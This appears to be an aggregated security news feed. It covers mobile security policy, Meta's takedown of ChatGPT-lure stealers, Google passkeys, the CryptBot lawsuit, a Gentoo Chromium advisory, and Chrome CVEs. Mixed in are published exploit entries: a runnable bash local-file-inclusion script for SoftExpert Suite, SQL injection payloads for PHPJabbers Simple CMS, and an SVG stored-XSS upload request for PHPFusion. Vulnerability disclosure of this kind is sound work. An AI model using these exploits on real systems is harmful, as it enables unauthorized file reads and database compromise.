Categories: Business
Categories: News
Tags: Small Business Week

Tags:  mobile security policy

Tags:  

A third of organizations aren't protecting their mobile devices at all. Don't be one of them.



(Read more...)




The post How small businesses can secure employees' mobile devices appeared first on Malwarebytes Labs.

Fact: 77% of organizations are convinced they're capable of protecting their mobile devices—smartphones, tablets, and laptops (including Chromebooks)—from cybersecurity threats.

Another fact: A third of those organizations aren't protecting their mobile devices at all.

And that matters—in its Mobile Security Index 2022 report, Verizon reported that 45 percent of businesses suffered a major mobile-related compromise with lasting repercussions.

The increase in companies' reliance on mobile devices that began with the pandemic persists today. Many employees are working on their mobile devices more, which follows that more mobile devices (53 percent) have access to sensitive data compared to pre-pandemic times. We recognize how critical such devices are to our work, and yet, confident or not, we continue to treat their defense against cyberattacks like an afterthought.

So what can small business owners do to quickly turn things around?

Start by recognizing that the mobile space has become a battleground, so protecting it is a must. And then, develop a mobile security policy that touches on essentials for securing employee mobile devices.

A cybersecurity policy is essentially a high-level plan detailing how a company will protect its physical and digital assets. In the context of mobile devices, that means protecting the sensitive data they store and have access to, and stopping non-employees from physically accessing such devices.

The policy doesn't have to be complicated or perfect, but it must be solid and effective. The document must evolve with changing technologies and attack trends to prevent it from becoming outdated. For a policy to be effective, it should clearly and explicitly state responsibilities for the organization and its employees.

Here's a list of some organizational duties you might want to include in your mobile security policy, to help you get started.

*   **Use a mobile device management (MDM) platform.** IT teams use MDM to provision, deploy, and manage mobile devices. It allows an administrator to perform remote tasks, such as troubleshooting and wiping devices after a theft. More importantly, an MDM can be used to enforce strong password practices and deploy software updates.
*   **Use a mobile endpoint security** solution to provide real-time protection to employee devices.
*   **Ensure employees** **use a VPN to connect to the company network****.** Your small business may have adopted a working scheme that allows employees to work anywhere. In this case, it's vital to encrypt data in transit, so you don't have to worry about your employees using public Wi-Fi.
*   **Use FIDO2 two-factor authentication (2FA).** FIDO stands for Fast Identity Online, a globally-recognized standard for passwordless authentication. Employees using mobile devices to read their emails are particularly vulnerable to phishing. Unlike other forms of 2FA, FIDO2 devices can't be phished.
*   **Set clear Bring Your Own Device (BYOD) guidelines,** explaining whether employees are allowed to use their personal devices for work and what their obligations are if they do.
*   **Educate employees on best practices for** **mobile security****.** Employees are your first line of defense—arm them with the tools and know-how they need to fulfill their role.

By creating a strong mobile security policy, a small business is better placed to prevent cyberattacks, and better prepared should one occur.

Good luck!

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

How small businesses can secure employees' mobile devices

Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023.
The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run

Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023.

The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run unauthorized ads from hijacked business accounts.

"Threat actors create malicious browser extensions available in official web stores that claim to offer ChatGPT-based tools," Meta said. "They would then promote these malicious extensions on social media and through sponsored search results to trick people into downloading malware."

The social media giant said it has blocked several iterations of a multi-pronged malware campaign dubbed Ducktail over the years, adding it issued a cease and desist letter to individuals behind the operation who are located in Vietnam.

Trend Micro, in a series of tweets last week, detailed an information stealer that's disguised as a Windows desktop client for ChatGPT to extract passwords, session cookies, and history from Chromium-powered browsers. The company said the malware shares similarities with Ducktail.

Besides ChatGPT, threat actors have also been observed shifting to other "hot-button issues and popular topics" like Google Bard, TikTok marketing tools, pirated software and movies, and Windows utilities to dupe people into clicking on bogus links.

"These changes are likely an attempt by threat actors to ensure that any one service has only limited visibility into the entire operation," Guy Rosen, chief information security officer at Meta, said.

The attack chains are primarily engineered to target the personal accounts of users who manage or are connected to business pages and advertising accounts on Facebook.

Besides using social media for propagating the ChatGPT-themed malicious URLs, the malware is hosted on a variety of legitimate services such as Buy Me a Coffee, Discord, Dropbox, Google Drive, iCloud, MediaFire, Mega, Microsoft OneDrive, and Trello.

Ducktail isn't the only stealer malware detected in the wild, for Meta disclosed that it uncovered another novel strain dubbed NodeStealer that's capable of plundering cookies and passwords from web browsers to ultimately compromise Facebook, Gmail, and Outlook accounts.

The malware is assessed to be of Vietnamese origin, with Meta noting that it "took action to disrupt it and help people who may have been targeted to recover their accounts" within two weeks of it being deployed in late January 2023.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

Samples analyzed by the company show that NodeStealer binary is distributed via Windows executables disguised as PDF and XLSX files with filenames relating to marketing and monthly budgets. The files, when opened, deliver JavaScript code that's designed to exfiltrate sensitive data from Chromium-based browsers.

NodeStealer gets its name from the use of the Node.js cross-platform JavaScript runtime environment, which is bundled along with the main payload, to set up persistence and execute the malware. No new artifacts have been identified as of February 27, 2023.

"After retrieving the Facebook credentials from the target's browser data, the malware uses it to make several unauthorized requests to Facebook URLs to enumerate account information related to advertising," Meta said. "The stolen information then enables the threat actor to assess and then use users' advertising accounts to run unauthorized ads."

In an attempt to slip under the radar of the company's anti-abuse systems, the rogue requests are made from the targeted user's device to the Facebook APIs, lending a veneer of legitimacy to the activity.

To counter such threats, Meta said it's launching a new support tool that guides users to identify and remove malware, enable businesses to verify connected Business Manager accounts, and require additional authentication when accessing a credit line or changing business administrators.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \    "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

SoftExpert Suite 2.1.3 Local File Inclusion

PHPJabbers Simple CMS version 5.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

PHPJabbers Simple CMS 5.0 SQL Injection

Gentoo Linux Security Advisory 202305-10 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions less than 109.0.5414.74-r1>= are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #876855, #878825, #883031, #883697, #885851, #890726, #886479, #890728, #891501, #891503  
       ID: 202305-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Chromium and its  
derivatives, the worst of which could result in remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web.

Google Chrome is one fast, simple, and secure browser for all your  
devices.

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/chromium        < 109.0.5414.74-r1>= 109.0.5414.74-r1  
  2  www-client/chromium-bin    < 109.0.5414.74      >= 109.0.5414.74  
  3  www-client/google-chrome   < 109.0.5414.74      >= 109.0.5414.74  
  4  www-client/microsoft-edge  < 109.0.1518.61      >= 109.0.1518.61

Description  
===========

Multiple vulnerabilities have been discovered in Chromium, Google  
Chrome, Microsoft Edge. Please review the CVE identifiers referenced  
below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-109.0.5414.74-r1"

All Chromium binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-bin-109.0.5414.74"

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-109.0.5414.74"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-109.0.1518.61"

References  
==========

[ 1 ] CVE-2022-3445  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3445  
[ 2 ] CVE-2022-3446  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3446  
[ 3 ] CVE-2022-3447  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3447  
[ 4 ] CVE-2022-3448  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3448  
[ 5 ] CVE-2022-3449  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3449  
[ 6 ] CVE-2022-3450  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3450  
[ 7 ] CVE-2022-3723  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3723  
[ 8 ] CVE-2022-4135  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4135  
[ 9 ] CVE-2022-4174  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4174  
[ 10 ] CVE-2022-4175  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4175  
[ 11 ] CVE-2022-4176  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4176  
[ 12 ] CVE-2022-4177  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4177  
[ 13 ] CVE-2022-4178  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4178  
[ 14 ] CVE-2022-4179  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4179  
[ 15 ] CVE-2022-4180  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4180  
[ 16 ] CVE-2022-4181  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4181  
[ 17 ] CVE-2022-4182  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4182  
[ 18 ] CVE-2022-4183  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4183  
[ 19 ] CVE-2022-4184  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4184  
[ 20 ] CVE-2022-4185  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4185  
[ 21 ] CVE-2022-4186  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4186  
[ 22 ] CVE-2022-4187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4187  
[ 23 ] CVE-2022-4188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4188  
[ 24 ] CVE-2022-4189  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4189  
[ 25 ] CVE-2022-4190  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4190  
[ 26 ] CVE-2022-4191  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4191  
[ 27 ] CVE-2022-4192  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4192  
[ 28 ] CVE-2022-4193  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4193  
[ 29 ] CVE-2022-4194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4194  
[ 30 ] CVE-2022-4195  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4195  
[ 31 ] CVE-2022-4436  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4436  
[ 32 ] CVE-2022-4437  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4437  
[ 33 ] CVE-2022-4438  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4438  
[ 34 ] CVE-2022-4439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4439  
[ 35 ] CVE-2022-4440  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4440  
[ 36 ] CVE-2022-41115  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41115  
[ 37 ] CVE-2022-44688  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44688  
[ 38 ] CVE-2022-44708  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44708  
[ 39 ] CVE-2023-0128  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0128  
[ 40 ] CVE-2023-0129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0129  
[ 41 ] CVE-2023-0130  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0130  
[ 42 ] CVE-2023-0131  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0131  
[ 43 ] CVE-2023-0132  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0132  
[ 44 ] CVE-2023-0133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0133  
[ 45 ] CVE-2023-0134  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0134  
[ 46 ] CVE-2023-0135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0135  
[ 47 ] CVE-2023-0136  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0136  
[ 48 ] CVE-2023-0137  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0137  
[ 49 ] CVE-2023-0138  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0138  
[ 50 ] CVE-2023-0139  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0139  
[ 51 ] CVE-2023-0140  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0140  
[ 52 ] CVE-2023-0141  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0141  
[ 53 ] CVE-2023-21719  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21719  
[ 54 ] CVE-2023-21775  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21775  
[ 55 ] CVE-2023-21795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21795  
[ 56 ] CVE-2023-21796  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21796

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-10

PHPFusion version 9.10.30 suffers from a persistent cross site scripting vulnerability.

Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)  
Application: PHPFusion  
Version: 9.10.30  
Bugs:  XSS  
Technology: PHP  
Vendor URL: https://www.php-fusion.co.uk/home.php  
Software Link: https://sourceforge.net/projects/php-fusion/  
Date of found: 28-04-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)  
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>

poc request:

POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1  
Host: localhost  
Content-Length: 1198  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0  
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="reqid"

187c77be8e52cf  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="cmd"

upload  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="target"

l1_Lw  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="mtime[]"

1681116842  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="overwrite"

0  
------WebKitFormBoundaryxF2jB690PpLWInAA--

3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(  
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)

poc video : https://youtu.be/6yBLnRH8pOY

PHPFusion 9.10.30 Cross Site Scripting

Almost five months after Google added support for passkeys to its Chrome browser, the tech giant has begun rolling out the passwordless solution across Google Accounts on all platforms.
Passkeys, backed by the FIDO Alliance, are a more secure way to sign in to apps and websites without having to use a traditional password. This, in turn, can be achieved by simply unlocking their computer or

Password Security / Authentication

Almost five months after Google added support for passkeys to its Chrome browser, the tech giant has begun rolling out the passwordless solution across Google Accounts on all platforms.

Passkeys, backed by the FIDO Alliance, are a more secure way to sign in to apps and websites without having to use a traditional password. This, in turn, can be achieved by simply unlocking their computer or mobile device with their biometrics (e.g., fingerprint or facial recognition) or a local PIN.

"And, unlike passwords, passkeys are resistant to online attacks like phishing, making them more secure than things like SMS one-time codes," Google noted.

Passkeys, once created, are locally stored on the device, and are not shared with any other party. This also obviates the need for setting up two-factor authentication, as it proves that "you have access to your device and are able to unlock it."

Users also have the choice of creating passkeys for every device they use to login to Google Account. That said, a passkey created on iPhone will be available on other devices if they are signed in to the same iCloud account.

It's worth noting that both Google Password Manager and iCloud Keychain use end-to-end encryption to keep the passkeys private.

Additionally, users can sign in on a new device or temporarily use a different device by selecting the option to "use a passkey from another device," which then uses the phone's screen lock and proximity to approve a one-time sign-in.

"The device then verifies that your phone is in proximity using a small anonymous Bluetooth message and sets up an end-to-end encrypted connection to the phone through the internet," the company explained.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

"The phone uses this connection to deliver your one-time passkey signature, which requires your approval and the biometric or screen lock step on the phone. Neither the passkey itself nor the screen lock information is sent to the new device."

While this may be the "beginning of the end of the password," the company said it intends to continue to support existing login methods like passwords and two-factor authentication for the foreseeable future.

Google is also recommending that users do not create passkeys on devices that are shared with others, a move that could effectively undermine all its security protections.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Introduces Passwordless Secure Sign-In with Passkeys for Google Accounts

Categories: News
Tags: CryptBot

Tags:  malware

Tags:  chrome

Tags:  download

Tags:  package

Tags:  packages

Tags:  google

Tags:  legal

Tags:  court order

Tags:  RICO

Tags:  Pakistan

We take a look at Google's efforts to shut down a particularly nasty set of modified Chrome installs playing host to CryptBot malware.



(Read more...)




The post Google takes CryptBot to the wood shed appeared first on Malwarebytes Labs.

Google is in the midst of a legal campaign designed to take down the creators of a very persistent piece of malware called CryptBot. This malware, which Google claims compromised roughly 670k computers, set about infecting users of the Chrome browser. Unfortunately for the malware campaign operators, Google's _not_ impressed.

This legal campaign focuses on shutting down domains associated with the stealer. The lawsuit unsealed this week reveals Google’s line of approach for tackling CryptBot’s alleged primary distributors, located in Pakistan.

It’s easy to see what piqued Google’s interest in this infection campaign. A big part of the CryptBot tactics on display involved offering up cracked or modified versions of popular Google products. The products were secretly infected with CryptBot, which would then go on to try and plunder credentials from the infected systems. From the complaint document:

> (The) defendants’ criminal scheme is perpetrated via a pay-per-install (“PPI”) network known as “360installer,” which fosters the creation of websites that offer illegally modified software (“Cracked Software Sites”).
> 
> These websites offer software infected with CryptBot malware, such as maliciously modified versions of Google Chrome and Google Earth Pro, and also cracked third party software. The Malware Distribution Enterprise operated by Defendants in this case is one of the primary means of spreading the CryptBot malware to new victims.

Google highlights that CryptoBot targets users of Chrome. When it notices Chrome is installed on a PC, it attempts to “locate, collect, and extract user credentials saved to Chrome”. This can be logins, authentication methods, private data, and several types of payment information, such as card details and cryptocurrencies.

This attempt at a takedown by Google isn’t just focused on the code side of things. There’s also a trademark component, and the search giant is none too happy about their familiar product icons being used for malware-related purposes. From the blogpost:

> The legal complaint is based on a variety of claims, including computer fraud and abuse and trademark infringement. To hamper the spread of CryptBot, the court has granted a temporary restraining order to bolster our ongoing technical disruption efforts against the distributors and their infrastructure. The court order allows us to take down current and future domains that are tied to the distribution of CryptBot. This will slow new infections from occurring and decelerate the growth of CryptBot.

As The Register notes, this goes beyond the usual restraining order approach where URL registries falling under the court’s jurisdiction must shut down rogue domains. Hardware and virtual machines can be turned off,  network providers can kill server connections powering CryptoBot, and steps can be taken to keep the infrastructure offline permanently.

In other words, the CryptoBot folks are in a lot of trouble. The complaint states that this action is being brought under the Racketeer Influenced and Corrupt Organisations (RICO) act, Computer Fraud and Abuse Act (CFAA), Lanham Act, and New York state common law. RICO alone, intended to deal with the dismantling of organised crime, should be enough to give the ringleaders pause for thought. Everything else is just a bonus.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google takes CryptBot to the wood shed

Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed a remote attacker who had compromised the renderer process to obfuscate the security UI via a crafted HTML page. (Chromium security severity: Low)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-2468: Stable Channel Update for Desktop

Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to spoof the contents of the security UI via a crafted HTML page. (Chromium security severity: Low)

Tag

#chrome